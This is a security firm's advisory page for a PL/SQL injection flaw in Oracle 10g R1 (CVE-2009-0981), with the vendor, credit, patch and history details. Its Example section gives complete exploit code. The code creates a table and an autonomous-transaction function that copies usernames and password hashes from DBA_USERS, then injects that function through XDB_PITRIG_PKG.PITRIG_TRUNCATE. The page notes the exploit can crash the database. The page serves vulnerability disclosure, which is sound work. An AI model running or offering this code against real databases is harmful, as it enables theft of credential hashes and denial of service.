Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
Oracle 10g R1 pitrig_truncate PLSQL Injection (get users hash)

Name Oracle 10g R1 pitrig_truncate PLSQL Injection (get users hash)
Systems Affected Oracle 10g R1
Severity High Risk
Category Get users hash
Vendor URL http://www.oracle.com/
Credit Alexandr Polyakov
Exploit http://www.milw0rm.com
Date 06 Jan 2009

Details

This exploit causes the connection to the database to be lost (database crash).


Example

CREATE TABLE SH2KERR(id NUMBER,name VARCHAR(20),password VARCHAR(16));
CREATE OR REPLACE FUNCTION SHOWPASS return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'INSERT INTO SCOTT.sh2kerr(id,name,password) SELECT user_id,username,password FROM DBA_USERS';
COMMIT;
RETURN '';
END;
/
EXEC XDB.XDB_PITRIG_PKG.PITRIG_TRUNCATE('SCOTT"."SH2KERR" WHERE 1=SCOTT.SHOWPASS()--','HELLO IDS IT IS EXPLOIT :)');
select * from sh2kerr;

Patch Information
Apply the latest Oracle Security patches (e.g. CPU April 2009 )


History
13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Advisory published



2009 by Red-Database-Security GmbH - last update 19-jun-2009

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.